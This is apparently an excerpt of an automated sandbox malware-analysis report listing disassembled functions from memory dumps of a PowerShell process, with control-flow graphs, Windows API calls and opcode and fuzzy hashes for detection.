                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SN$kH$kN$M
                                                • API String ID: 0-872941900
                                                • Opcode ID: c663fcac74bad1b6ca8e084fb8909d2d446d584d61f0528340e3080ca2c515e9
                                                • Instruction ID: 8d8c213d7cf76a1afe1b4ca6a49196fca278a0577dc04f64b207dc1ce21c4268
                                                • Opcode Fuzzy Hash: c663fcac74bad1b6ca8e084fb8909d2d446d584d61f0528340e3080ca2c515e9
                                                • Instruction Fuzzy Hash: 71919D34A002459FC714DF68D580AAEBBF2EF88219F56C96CE406AF751CB35EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086361E8 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 695 86361e8-8636207 698 8636210-863624c 695->698 699 8636209-863620f 695->699 704 8636252-863625a 698->704 705 86362e7-8636346 698->705 706 8636276-8636288 704->706 707 863625c-8636274 704->707 724 863634d-863635b 705->724 714 86362d6-86362e6 706->714 715 863628a-86362d4 706->715 707->706 707->714 715->714
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'}l$c}l
                                                • API String ID: 0-3983991366
                                                • Opcode ID: 1df06323503bd74f623b11aa9c934c308e0dc60d248f867683e6819530bb5dcd
                                                • Instruction ID: 5679151a2e73c00c6117556a0f06ca8849b3c663d8d4fe47ba2216e4ab7bbe79
                                                • Opcode Fuzzy Hash: 1df06323503bd74f623b11aa9c934c308e0dc60d248f867683e6819530bb5dcd
                                                • Instruction Fuzzy Hash: 9C41E4347042105FD708ABB8D894BBE37E69FCA615F1640B9D50ACF7A1DF25DC0687A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08F653D0 Relevance: 1.8, APIs: 1, Instructions: 302threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1219 8f653d0-8f653f3 1220 8f657f4-8f6589f SetThreadUILanguage 1219->1220 1221 8f653f9-8f65404 1219->1221 1233 8f658a1-8f658a7 1220->1233 1234 8f658a8-8f658c2 1220->1234 1221->1220 1224 8f6540a-8f65441 1221->1224 1236 8f65447-8f65457 1224->1236 1237 8f65722-8f65744 1224->1237 1233->1234 1243 8f65605-8f65625 1236->1243 1244 8f6545d-8f65470 1236->1244 1240 8f65746 1237->1240 1241 8f6574f 1237->1241 1240->1241 1241->1220 1249 8f65627-8f6563d 1243->1249 1250 8f65645-8f65660 1243->1250 1247 8f65476-8f65483 1244->1247 1248 8f6551e-8f6552b 1244->1248 1257 8f65485-8f6548b 1247->1257 1258 8f6549b-8f654a7 1247->1258 1259 8f65543-8f6555c 1248->1259 1260 8f6552d-8f65533 1248->1260 1249->1250 1255 8f656d7-8f6571c 1250->1255 1256 8f65662-8f6567f 1250->1256 1255->1236 1255->1237 1276 8f656b0-8f656c9 1256->1276 1277 8f65681-8f656ae 1256->1277 1261 8f6548f-8f65491 1257->1261 1262 8f6548d 1257->1262 1258->1248 1270 8f654a9-8f654b6 1258->1270 1274 8f65574-8f65589 call 8f64e40 1259->1274 1275 8f6555e-8f65564 1259->1275 1263 8f65537-8f65539 1260->1263 1264 8f65535 1260->1264 1261->1258 1262->1258 1263->1259 1264->1259 1279 8f654ce-8f654da 1270->1279 1280 8f654b8-8f654be 1270->1280 1289 8f6558f-8f65592 1274->1289 1281 8f65566 1275->1281 1282 8f65568-8f6556a 1275->1282 1287 8f656d4 1276->1287 1288 8f656cb 1276->1288 1277->1276 1292 8f654dc-8f654e9 1279->1292 1293 8f65519 1279->1293 1285 8f654c2-8f654c4 1280->1285 1286 8f654c0 1280->1286 1281->1274 1282->1274 1285->1279 1286->1279 1287->1255 1288->1287 1289->1255 1297 8f65501-8f65517 1292->1297 1298 8f654eb-8f654f1 1292->1298 1293->1248 1297->1248 1297->1293 1300 8f654f5-8f654f7 1298->1300 1301 8f654f3 1298->1301 1300->1297 1301->1297
                                                APIs
                                                • SetThreadUILanguage.KERNELBASE ref: 08F65892
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID: LanguageThread
                                                • String ID:
                                                • API String ID: 243849632-0
                                                • Opcode ID: 63958e25cf07394a691ef7375eb3f88955d55a97fc6ed9feb73b888ca360cc5f
                                                • Instruction ID: 84b4fe68146077bc3d82dfca0edc6c31051b3a640474824326133434dc70ddd3
                                                • Opcode Fuzzy Hash: 63958e25cf07394a691ef7375eb3f88955d55a97fc6ed9feb73b888ca360cc5f
                                                • Instruction Fuzzy Hash: C2C10774A00204CFCB14DF68D598AADBBF6BF88326F1585A9E406AB361DB35DD11CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08631760 Relevance: 1.8, Strings: 1, Instructions: 518COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1305 8631760-8631799 1307 8631848-8631854 call 863ba49 1305->1307 1308 863179f-86317a6 1305->1308 1311 863185a-863185c 1307->1311 1309 8631c2f-8631c53 1308->1309 1310 86317ac-86317c9 1308->1310 1336 8631c5a-8631c8a 1309->1336 1321 86317cb-86317e1 1310->1321 1322 86317e9-86317fe 1310->1322 1312 8631870-863188b 1311->1312 1313 863185e-863186e 1311->1313 1330 863189f 1312->1330 1331 863188d-863189d 1312->1331 1320 86318a1-86318ab 1313->1320 1325 86318b6-86318bc 1320->1325 1326 86318ad 1320->1326 1321->1322 1454 8631801 call 8631ed0 1322->1454 1455 8631801 call 8631ec8 1322->1455 1327 8631b53-8631b57 1325->1327 1328 86318c2-86318c4 1325->1328 1326->1325 1334 8631b59-8631b66 1327->1334 1335 8631b68-8631b6f 1327->1335 1328->1327 1333 86318ca-86318cc 1328->1333 1330->1320 1331->1320 1337 86318d2-86318d6 1333->1337 1338 8631b45-8631b48 1333->1338 1345 8631bae-8631bb2 1334->1345 1340 8631b71-8631b73 1335->1340 1341 8631b75-8631b7f 1335->1341 1384 8631c91-8631cc1 1336->1384 1337->1336 1344 86318dc-86318e6 1337->1344 1338->1345 1339 8631807-8631845 1347 8631b87-8631b8b 1340->1347 1341->1347 1344->1336 1349 86318ec-86318f2 1344->1349 1350 8631bb4-8631bd4 1345->1350 1351 8631bda-8631bf0 1345->1351 1353 8631bab 1347->1353 1354 8631b8d-8631ba9 1347->1354 1355 8631904-8631913 1349->1355 1356 86318f4-86318fe 1349->1356 1350->1351 1364 8631cc8-8631d6f 1350->1364 1365 8631bf2-8631bf5 1351->1365 1366 8631bfe-8631c2c 1351->1366 1353->1345 1354->1353 1368 8631915-8631919 1355->1368 1369 863196d-8631983 1355->1369 1356->1336 1356->1355 1425 8631d71-8631d7f 1364->1425 1426 8631d87-8631d89 1364->1426 1365->1366 1376 863191b-8631931 1368->1376 1377 8631939-8631948 1368->1377 1374 8631a17-8631a1e 1369->1374 1375 8631989-86319bb 1369->1375 1378 8631a20-8631a36 1374->1378 1379 8631a3e-8631a97 1374->1379 1400 86319db-8631a12 1375->1400 1401 86319bd-86319d3 1375->1401 1376->1377 1377->1384 1388 863194e-8631967 1377->1388 1378->1379 1421 8631ab7-8631ad1 1379->1421 1422 8631a99-8631aaf 1379->1422 1384->1364 1388->1369 1388->1384 1400->1345 1401->1400 1436 8631ad3-8631ae5 1421->1436 1437 8631b1e-8631b37 1421->1437 1422->1421 1425->1426 1439 8631d81-8631d86 1425->1439 1428 8631da7 1426->1428 1429 8631d8b-8631d91 1426->1429 1434 8631da9-8631dc0 1428->1434 1431 8631d93-8631d95 1429->1431 1432 8631d97-8631da3 1429->1432 1438 8631da5 1431->1438 1432->1438 1447 8631ae7-8631afd 1436->1447 1448 8631b05-8631b1c 1436->1448 1443 8631b42 1437->1443 1444 8631b39 1437->1444 1438->1434 1443->1338 1444->1443 1447->1448 1448->1436 1448->1437 1454->1339 1455->1339
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;}l
                                                • API String ID: 0-3723764175
                                                • Opcode ID: 02e180d4b3dd25b0d80cb36f07b4fe178f5e8723ca40310c4e51f44d6a9fd708
                                                • Instruction ID: 715082fb8801a36de026d05613e39320ccb43fc2fd5545bd86c71b87f9a48de4
                                                • Opcode Fuzzy Hash: 02e180d4b3dd25b0d80cb36f07b4fe178f5e8723ca40310c4e51f44d6a9fd708
                                                • Instruction Fuzzy Hash: E8127D34B002249FCB14DF68D594AADB7F6EF89315F1640A9E502EB3A1DB75EC42CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08745AD7 Relevance: 1.6, APIs: 1, Instructions: 131pipeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08746398
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateNamedPipe
                                                • String ID:
                                                • API String ID: 2489174969-0
                                                • Opcode ID: f411c91ec2fb23592d51bd5fe9b16b838872878723f4c33c985046eea0868c77
                                                • Instruction ID: d547979fe92151b61043fb7aba901f93eb32a70e12dda19f106f611ac4baca16
                                                • Opcode Fuzzy Hash: f411c91ec2fb23592d51bd5fe9b16b838872878723f4c33c985046eea0868c77
                                                • Instruction Fuzzy Hash: 915116B0D00348EFDB14CFA9C884BDEBBF6AF59314F24852AE408AB251D7749981CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0874626D Relevance: 1.6, APIs: 1, Instructions: 128pipeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08746398
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateNamedPipe
                                                • String ID:
                                                • API String ID: 2489174969-0
                                                • Opcode ID: 1bc3e49b3de683ea03be2aacc6761d2da6000d85ee5ed5cbe609a8d2f8855a84
                                                • Instruction ID: 777542f9bd1d4c82f11e63a86960632689a8d699ebde2f66d259333672b94cc5
                                                • Opcode Fuzzy Hash: 1bc3e49b3de683ea03be2aacc6761d2da6000d85ee5ed5cbe609a8d2f8855a84
                                                • Instruction Fuzzy Hash: 5D51F4B1D00358EFDB14CFA9D884BCEBBF6AF49304F24852AE418AB261D7749985CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 085EF8C0 Relevance: 1.6, APIs: 1, Instructions: 96fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 085EF9A6
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: ca2b3279634c466cb6800e2d984eecd81b506374362e18bb7c0391c65fb7fd1c
                                                • Instruction ID: ee74cc10c4e5563cfd81c2a11bf7be080a8ad3aa588009b5b49f9f5a33d63852
                                                • Opcode Fuzzy Hash: ca2b3279634c466cb6800e2d984eecd81b506374362e18bb7c0391c65fb7fd1c
                                                • Instruction Fuzzy Hash: 75412471D00249AFDB14CFA9C885BDEBBF2BF48314F148169E859EB250CB749885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05056650 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 0505A650
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4962312820.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5050000_powershell.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 612d739c4c4d443ee1a4f387d3a45e4039c3b2bee0fcb819217e09be401c992b
                                                • Instruction ID: e3e37d3fc086426d339632fdc75f05930dfde205fdcc6b281f18fa99fabac164
                                                • Opcode Fuzzy Hash: 612d739c4c4d443ee1a4f387d3a45e4039c3b2bee0fcb819217e09be401c992b
                                                • Instruction Fuzzy Hash: C22106B1D006199BCB10CF9AD844BDEFBF8FB48620F04856AD819B7240D774AA44CFE5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0505A5D8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 0505A650
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4962312820.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5050000_powershell.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 4f27125a8d6428bd3f9491142a61883128617324562ae89337346ce8e109a9a5
                                                • Instruction ID: 003e67232139e6b9074500274238f19e12c231e3575c46e06d5af6a345e34aff
                                                • Opcode Fuzzy Hash: 4f27125a8d6428bd3f9491142a61883128617324562ae89337346ce8e109a9a5
                                                • Instruction Fuzzy Hash: D02122B5D0061A9BCB10CFAAD444BDEFBF8FF48620F00852AD818A7240C778A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 085EFA38 Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?,?), ref: 085EFAAE
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: bcebaf4de2ddf2e2a5dbaa09394abbb822dd7b7038701f2ad1ff2e2f594bc0cb
                                                • Instruction ID: 77ba994b8a3cc3f731fa4f542df6314b11f43152e2d74e88f1538e29f2accca0
                                                • Opcode Fuzzy Hash: bcebaf4de2ddf2e2a5dbaa09394abbb822dd7b7038701f2ad1ff2e2f594bc0cb
                                                • Instruction Fuzzy Hash: 4B11E4B59002499FCB20CF9AD884BDEFBF4FF48324F14842AE919A7250C774A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08F65830 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetThreadUILanguage.KERNELBASE ref: 08F65892
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID: LanguageThread
                                                • String ID:
                                                • API String ID: 243849632-0
                                                • Opcode ID: 85d46c95a720950010cbda1482391b41931e26e0f6464abd2cc132467938fc26
                                                • Instruction ID: cdb3fa80235794f04f431e2897b2d66cfc4c08a062bad9f7e5324d2ac7d3e616
                                                • Opcode Fuzzy Hash: 85d46c95a720950010cbda1482391b41931e26e0f6464abd2cc132467938fc26
                                                • Instruction Fuzzy Hash: 381103B48006598FCB10CFA9D488BEEFBF8EF48725F10845AD568A7650C778A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 085EFAF0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID: EnumWindows
                                                • String ID:
                                                • API String ID: 1129996299-0
                                                • Opcode ID: cc5c7427f173148334a9e1b0e0088db96ec975ba1f5d944e599b4ef375972500
                                                • Instruction ID: 7b029c1b346186bca5981364ea5aa75e0c1030f509e328c976de0cf5241762fd
                                                • Opcode Fuzzy Hash: cc5c7427f173148334a9e1b0e0088db96ec975ba1f5d944e599b4ef375972500
                                                • Instruction Fuzzy Hash: A61103B18003498FCB20CF9AD888BDEBBF8EF88324F108459D458A7250C774A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863B378 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;+
                                                • API String ID: 0-1950319332
                                                • Opcode ID: 07a1623843bc3fe8ed0d38fa397b98c7002b7bb8b15945cdbe31fef5c44b213d
                                                • Instruction ID: eafe696a6ba8a153bf98e7a36a6372780fb13d44f8a4f7dd12a21a0a8c85ccd5
                                                • Opcode Fuzzy Hash: 07a1623843bc3fe8ed0d38fa397b98c7002b7bb8b15945cdbe31fef5c44b213d
                                                • Instruction Fuzzy Hash: EAA12334A04204AFDB05DFA4D854BEE7BBAEFC4311F05846AE8069B791CF399D46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086395E8 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR}l
                                                • API String ID: 0-1093396623
                                                • Opcode ID: 518971b00d8eb7c56a361c037b5fad820446d94ddd516fd2cdab3280d533702e
                                                • Instruction ID: 0e834478ed41a18ffd9de03117fc7f39d9f4fa20522da646baf8b8a3b00767ae
                                                • Opcode Fuzzy Hash: 518971b00d8eb7c56a361c037b5fad820446d94ddd516fd2cdab3280d533702e
                                                • Instruction Fuzzy Hash: 51A14674A00214DFC718EF64D498AADBBB2FF89315F158469E9069B3A0DB75EC42CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863788C Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR}l
                                                • API String ID: 0-1093396623
                                                • Opcode ID: 6a0998f8faeeff7c3f4e92829381f8b107955f1ac6a7e68ed08923665e1aceda
                                                • Instruction ID: c9fb19300facbdc65ca77ab222753ccf29e6de64eb77cb0c2af45c147c86be1a
                                                • Opcode Fuzzy Hash: 6a0998f8faeeff7c3f4e92829381f8b107955f1ac6a7e68ed08923665e1aceda
                                                • Instruction Fuzzy Hash: 72513A70A00218CFDB18DFA4D499BAEBBB6FF48706F154179E406AB390DB359D46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863B370 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;+
                                                • API String ID: 0-1950319332
                                                • Opcode ID: 7205ce0f6dc649017ea1c4a47267dbb1a9cbda2d7f6e4331776d30e23f436331
                                                • Instruction ID: 2dcc1d167880f876316524fe21b54ae360073d186157aaec661f886f9de3fb09
                                                • Opcode Fuzzy Hash: 7205ce0f6dc649017ea1c4a47267dbb1a9cbda2d7f6e4331776d30e23f436331
                                                • Instruction Fuzzy Hash: ED212372600225AFDB118F48D840AFE7BE6FF84325F06852EF8049B251C779CC12CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08674190 Relevance: .5, Instructions: 476COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fe96ee0e6fbde6fd146e32aa4a68086da38dc0954bcf964290e5cbcb0692cf2
                                                • Instruction ID: 849928e13a3cbc5c3653a8e798ec0f0446e81a284dc72fea853c0bf7f94f894e
                                                • Opcode Fuzzy Hash: 8fe96ee0e6fbde6fd146e32aa4a68086da38dc0954bcf964290e5cbcb0692cf2
                                                • Instruction Fuzzy Hash: BBF1153060E7C49BD376DB78C48C55ABFE2EF82224B49899DC1C99F643CE265815DB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FD249 Relevance: .4, Instructions: 408COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aebf356af025a4f95d7011e5880a6a5198b7ba8210f990ba5a6d5fb320ba74a8
                                                • Instruction ID: 1644d9d674fc9d5ed99d354a5cd6ee1e5841aa41b7322baaf607bfc01c914ec8
                                                • Opcode Fuzzy Hash: aebf356af025a4f95d7011e5880a6a5198b7ba8210f990ba5a6d5fb320ba74a8
                                                • Instruction Fuzzy Hash: 9D020C34A00218CFCB14DFA5D494A9DBBB6FF89305F258469D50AAB365DB35EC41CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08630448 Relevance: .3, Instructions: 345COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 007a072ebc1bbae59494e7263472896b30310b25d2bea59e558a4b3e61e4bedf
                                                • Instruction ID: 9f6f474ef31097b6cfa70fe97ccfb62c66731d9a359f23563598d7ab0744603c
                                                • Opcode Fuzzy Hash: 007a072ebc1bbae59494e7263472896b30310b25d2bea59e558a4b3e61e4bedf
                                                • Instruction Fuzzy Hash: C5C1BF357006158FC714EB68C890AAE73A7EFC4218B468968E506DF365DF74ED0ACBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F8B70 Relevance: .3, Instructions: 335COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f95d331576a876ac737d921f0917f8aa79339f46c9f8063e17ceee7397f05157
                                                • Instruction ID: 31835f44681e05959b78918fc0ec44117e2714f6e3d59420a258d5154cd8ae70
                                                • Opcode Fuzzy Hash: f95d331576a876ac737d921f0917f8aa79339f46c9f8063e17ceee7397f05157
                                                • Instruction Fuzzy Hash: 79C16C34B00204CFDB14DB65D484BAEB7E6AF88316F198079EA06DB3A6DB74DC45CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863D910 Relevance: .3, Instructions: 331COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02134814c7f3f18c10dbfc675220637267533eda5399f9e8f0568363cf77054
                                                • Instruction ID: 2c6bc8bf61bcd4a9a16626ae347ed1eb84a7a7bedecfac9f2b311894a8a09a6e
                                                • Opcode Fuzzy Hash: f02134814c7f3f18c10dbfc675220637267533eda5399f9e8f0568363cf77054
                                                • Instruction Fuzzy Hash: 35D19074700254AFC704EB64C951AEEB7E3FB85218F11892DD505AB781DFB6AD0ACBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08638130 Relevance: .3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee8d4c41fb43521ce297e33a658a429dc2dfaaf6fae97bea180b0f0c51419729
                                                • Instruction ID: 779a0513ac0b42fea64cf983717c2af252797a25ea41579a15061ff42f1ce134
                                                • Opcode Fuzzy Hash: ee8d4c41fb43521ce297e33a658a429dc2dfaaf6fae97bea180b0f0c51419729
                                                • Instruction Fuzzy Hash: D7C15A70A00259DFDB15CFA4C494BAEBBB2BF85302F168478E805AB7A5DB74EC45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F7D30 Relevance: .3, Instructions: 270COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1365fdb3da182676686e7fa10e57d319be020ac97bb3a2e3794e0883e31302f6
                                                • Instruction ID: fb2097908fbfd9d728d11a511349110fb0c275ae1fe47740327182f620975daa
                                                • Opcode Fuzzy Hash: 1365fdb3da182676686e7fa10e57d319be020ac97bb3a2e3794e0883e31302f6
                                                • Instruction Fuzzy Hash: DDA17E30A00208DFCB18DF65D495AAEBBB6EF88301F10843DE516DB395DB349C42CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863CA20 Relevance: .3, Instructions: 255COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07964c939effa146f1f541cc3ef7e0f7befa80cebd68c6e8da07153130660116
                                                • Instruction ID: c4a58b4e6759da20d1d5eced2cd98e6deb365b9cb9381b323d9416f9f3937388
                                                • Opcode Fuzzy Hash: 07964c939effa146f1f541cc3ef7e0f7befa80cebd68c6e8da07153130660116
                                                • Instruction Fuzzy Hash: E691CD34B002159FCB15DFA4D895ABE77A6EF88215F05806DF902AB382CB39DD42DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08630417 Relevance: .2, Instructions: 241COMMON
                                                Download Yara Rule
